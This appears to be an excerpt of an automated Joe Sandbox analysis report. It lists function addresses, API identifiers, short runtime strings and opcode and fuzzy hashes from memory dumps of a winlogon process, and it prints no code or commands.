                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: _set_statfp
                          • String ID:
                          • API String ID: 1156100317-0
                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                          • Instruction ID: f42d5f5a704ddb6eb0c576794086d780c79e25a3ea788a9c9f775ae5c7c9e848
                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                          • Instruction Fuzzy Hash: AC11A3B2B30BD092F6645569D4623EDBB407F783B8F0A0636BDBE076D6CE26C8414301
                          Function 000001E8589F3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293641040.000001E8589E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589e0000_winlogon.jbxd
                          Similarity
                          • API ID: _set_statfp
                          • String ID:
                          • API String ID: 1156100317-0
                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                          • Instruction ID: 7c27a998020b71c4d8989169eaae53b56dbdcb9ff73b2be6681024ec195a73bf
                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                          • Instruction Fuzzy Hash: 6B117332A34AD191FBAE1968E4553EDB1816FD8374F48873AAE7E066D6CE2CC8457110
                          Function 000001E858993504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293552405.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e858980000_winlogon.jbxd
                          Similarity
                          • API ID: _set_statfp
                          • String ID:
                          • API String ID: 1156100317-0
                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                          • Instruction ID: 5ae2b81b01df07d095a8c6f67efdb50be62736a34741f5bf77a128705f7f4416
                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                          • Instruction Fuzzy Hash: 6411A336A30ED1D2FA641D28E4413EDB1836F5CB74F48A73AAD6F466E6DE24C8417102
                          Function 000001E8589EF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293641040.000001E8589E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589e0000_winlogon.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                          • API String ID: 3215553584-4202648911
                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                          • Instruction ID: 140e9928f9eeb819c3a9f89b1b9d2bef5f2736473d3d500968b7335e422da2c7
                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                          • Instruction Fuzzy Hash: 7361BE726206C4C3FA6A8B68E5403EEFEA0EF85784F5144B7CE4E177A5DF34C8658200
                          Function 000001E85898F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293552405.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e858980000_winlogon.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                          • API String ID: 3215553584-4202648911
                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                          • Instruction ID: c085a7186edd0bd96b3b5f96f8b8f0c801fd9b3b4f1f589b90990ea3c2410778
                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                          • Instruction Fuzzy Hash: 9A61C2327206C2C6FA659B64E5403EEF6A1EF85794F54653BCE0E17BA6DF34C8468B00
                          Function 000001E8589BAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: CallEncodePointerTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3544855599-2084237596
                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction ID: d19808ae33988bda2650a5844b5d1748d42811ed884e7eddb2be384cf9521a74
                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction Fuzzy Hash: 06614532629B84CAEB20DF65D4803DDB7A1FB48B89F044226EE8D17B98DF38D595C701
                          Function 000001E8589BAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                          • Instruction ID: 04f104a1198cfe77e9f18ad21fa7f3ffbc06d51044aeee31fab7197b13b47274
                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                          • Instruction Fuzzy Hash: 085149722292C0CEEB648B25D5843DDB7E0EB94B96F184127DE9D47AD5CF38D490CB02
                          Function 000001E8589EA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293641040.000001E8589E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589e0000_winlogon.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                          • Instruction ID: 87889822b3ea70725ee62691749f5b046ba5612f0249118df8383dd01267dac0
                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                          • Instruction Fuzzy Hash: 105149322242C0CBEB648B15D54439CBBE1FB65B94F185227DE9D97BE5CF38D4A08702
                          Function 000001E85898A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293552405.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e858980000_winlogon.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                          • Instruction ID: 8b88985d8a19d565553951c9a4f98d0a05d5b30a49fe722d51b10b02fba8460f
                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                          • Instruction Fuzzy Hash: 185146332206C2CAEB748B25D54479CB7E0FB55B94F188227DE9D87A95CF39D491CB02
                          Function 000001E8589E8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293641040.000001E8589E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589e0000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritable__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 3242871069-629598281
                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction ID: 099f969cc5bd736f6d67fe92d6e845c52d8758bcb57ffd7a29335c130b4cd1f9
                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction Fuzzy Hash: C551DC32721684CBEB19CB55E445BDCBB99FB50B98F518476DE0E63788EF34C8918B04
                          Function 000001E858988405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293552405.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e858980000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritable__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 3242871069-629598281
                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction ID: 969eefac54521e2ab512f8dcd0a7caf11298dcb48de377119434fb7e3a9081bd
                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction Fuzzy Hash: 9751CE32721282CAEB14CB25E405BDDB799FB50B98F508176DE0E63788EF39CC418B24
                          Function 000001E8589E83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293641040.000001E8589E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589e0000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritable__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 3242871069-629598281
                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction ID: b08728ea23304a6557cbee23b870c1d072c53d303c9a030cbd8fb9641df76763
                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction Fuzzy Hash: 5C319A32221680DBE719DF51E845BDDBBA8FB40B88F458426EE5E13B88DF38C960C704
                          Function 000001E8589883E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293552405.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e858980000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritable__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 3242871069-629598281
                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction ID: 354f9a0964b41297c1ff2c31b1f1025270f73fa256f3a12dbaa3ee87bf0d0c62
                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction Fuzzy Hash: DF31BC32221781D6E714DF21E845BDEB7A9FB40B88F458026EE9E53B88DF39C941CB14
                          Function 000001E8589C2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: FileWrite$ConsoleErrorLastOutput
                          • String ID:
                          • API String ID: 2718003287-0
                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                          • Instruction ID: 4a834175d774d777cb47a958f8acb45f37ceab2a92498808f5a7062e48617104
                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                          • Instruction Fuzzy Hash: F5D1BE32724A80CAE711CFA9D4403ECBBB1FB54B98F144226DE5E97B99DE35C506C740
                          Function 000001E8589B14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$Process$Free
                          • String ID:
                          • API String ID: 3168794593-0
                          • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                          • Instruction ID: d0a60abff6c19dd014d05dd9f9736618db482ff87e777856ee8a457250a06e81
                          • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                          • Instruction Fuzzy Hash: CF014C32624AD0CAD705EFA6E90428EBBA1FB8DF82F05443AEE4D43719DE38C051C740
                          Function 000001E8589C2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: ConsoleErrorLastMode
                          • String ID:
                          • API String ID: 953036326-0
                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                          • Instruction ID: ca626266aa0a7b474a878b61d5899873dc42c35356b0549f9cccd0328b52c02c
                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                          • Instruction Fuzzy Hash: 23918C72620AD0C9F7659FA5D8903EDFFA0BB45B88F54412BDE0E67A95DE36C482C700
                          Function 000001E8589B7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 2933794660-0
                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                          • Instruction ID: 276b10aab837e175542a230bfec2f0a123e9c9319c4b0de011574a2981c74ca1
                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                          • Instruction Fuzzy Hash: 5E111836721F81CAEB00DBA0E8543AC73A4FB19759F440E36DE6D867A5DF78D1988380
                          Function 000001E8589B253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                          • Instruction ID: 0b3dc21db449fcbf1c19d302490e59a14833865d5b2b70b353a7510e9e64bdbc
                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                          • Instruction Fuzzy Hash: 9771BF362287C1CDE6249AA9D8843EEF791FF89B86F440037DD0E53B89DE35D5418704
                          Function 000001E8589E9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293641040.000001E8589E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589e0000_winlogon.jbxd
                          Similarity
                          • API ID: CallTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3163161869-2084237596
                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction ID: 2e6b4ddcb25fad61f5095f27fbe66ce87663b3d714944b67a1caa87948b842f6
                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction Fuzzy Hash: 3C613532A10A84CAEB20DF65D4803DDBBA0FB58B88F044626EF4D17B99DF38D5A5C700
                          Function 000001E858989E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293552405.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e858980000_winlogon.jbxd
                          Similarity
                          • API ID: CallTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3163161869-2084237596
                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction ID: 613368ca26f5213a448d05eae5b26de1d91f394644821e2679e3739e87edce54
                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction Fuzzy Hash: 07612633620A86CAEB24DF65D4403DDBBA0FB44B88F144226EE4E17B99DF38D595CB00
                          Function 000001E8589B2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                          • Instruction ID: db0d46813ac5e8fd5f39f756d67a1fcb3148512911a86185a8375fd33465d585
                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                          • Instruction Fuzzy Hash: 8B51D03222C3C1C9E665DAA9E4583EEF792FB85792F440136DE5E03B99CE39C9048740
                          Function 000001E8589C26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: ErrorFileLastWrite
                          • String ID: U
                          • API String ID: 442123175-4171548499
                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                          • Instruction ID: 86a7781e38c697fc0abcbd8b7a322b6ea8dd4ce0b7b2c3ea935c5dab76c89125
                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                          • Instruction Fuzzy Hash: 83415C72625A80C6EB209B65E8443EDFBA1FB98B94F504136EE4E87794EF39C441CB40
                          Function 000001E8589B94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: ExceptionFileHeaderRaise
                          • String ID: csm
                          • API String ID: 2573137834-1018135373
                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                          • Instruction ID: b3421d11e61861fdfaec7805ab92e2b149d9a2defd5c3d3a43f6ba353e8bbdff
                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                          • Instruction Fuzzy Hash: D7112B32228B8086EB618B15E44039EB7E5FB88B95F584236EE8C07758EF3DC551CB00
                          Function 000001E8589E7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293641040.000001E8589E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589e0000_winlogon.jbxd
                          Similarity
                          • API ID: __std_exception_copy
                          • String ID: ierarchy Descriptor'$riptor at (
                          • API String ID: 592178966-758928094
                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                          • Instruction ID: 2c5b5f2923ff0a7a55bd4f6c064529cbb27ade499dec8ece143054e1ec4af3e3
                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                          • Instruction Fuzzy Hash: 5CE04F61650B84D1DB0A8F61E8802D873A09B58B64B8991229D5C16311EE38D1E9C300
                          Function 000001E858987356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293552405.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e858980000_winlogon.jbxd
                          Similarity
                          • API ID: __std_exception_copy
                          • String ID: ierarchy Descriptor'$riptor at (
                          • API String ID: 592178966-758928094
                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                          • Instruction ID: ec66882b4d3ae1b64dd5078d85d2ddc26122b5e01e13c0459ee6ee22340de03e
                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                          • Instruction Fuzzy Hash: 12E08671650B85D0EF018F21E8402DC73A1DF58B64F8891339D5C06311FE38D1E9C300
                          Function 000001E8589E73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293641040.000001E8589E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589e0000_winlogon.jbxd
                          Similarity
                          • API ID: __std_exception_copy
                          • String ID: Locator'$riptor at (
                          • API String ID: 592178966-4215709766
                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                          • Instruction ID: 8db7e502f7541ce4c4e4eefef0bcc65bf87d560e7147f37bfdc45b7fe914ba80
                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                          • Instruction Fuzzy Hash: 5FE08C71A20B88C4DF0A8F61E8802DCB3A0EB68B64BC89133CE4C16351EE38D1E9C300
                          Function 000001E8589873B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293552405.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e858980000_winlogon.jbxd
                          Similarity
                          • API ID: __std_exception_copy
                          • String ID: Locator'$riptor at (
                          • API String ID: 592178966-4215709766
                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                          • Instruction ID: 51b56e7d7da7883d564ff1d8aa55c5c33bcb232568c085f55078eb698fd1127b
                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                          • Instruction Fuzzy Hash: 3CE08C71A20B88C4EF028F21E8802DCB3A1EB68B64FC89133CE4C06311EE38D1E9C300
                          Function 000001E8589B1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID:
                          • API String ID: 756756679-0
                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                          • Instruction ID: e1d6aeabad6ccef3ff38877d506157880c324e0593935b115836214f7ad20565
                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                          • Instruction Fuzzy Hash: BE116035725BC4C5EA15DB66E8043ADB7A1FB89FC1F18403ADE4D53765DE39C8428300
                          Function 000001E8589B1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID:
                          • API String ID: 1617791916-0
                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                          • Instruction ID: caadc08de9d2bac00fe2f05b454c5bd5b931daf7e9d403db42940cda31ad44e3
                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                          • Instruction Fuzzy Hash: CEE03975721684C6EB058BA2D80838ABFE1EB89B06F0480288D0907351DF7EC499C750

                          Executed Functions

                          Function 00007FF7F7901140 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000004C.00000002.2207521315.00007FF7F7901000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7F7900000, based on PE: true
                          • Associated: 0000004C.00000002.2207389031.00007FF7F7900000.00000002.00000001.01000000.0000000F.sdmpDownload File
                          • Associated: 0000004C.00000002.2207704980.00007FF7F790B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                          • Associated: 0000004C.00000002.2207869019.00007FF7F790E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                          • Associated: 0000004C.00000002.2208057212.00007FF7F790F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                          • Associated: 0000004C.00000002.2209368300.00007FF7F7E38000.00000004.00000001.01000000.0000000F.sdmpDownload File
                          • Associated: 0000004C.00000002.2209405116.00007FF7F7E3A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                          Joe Sandbox IDA Plugin
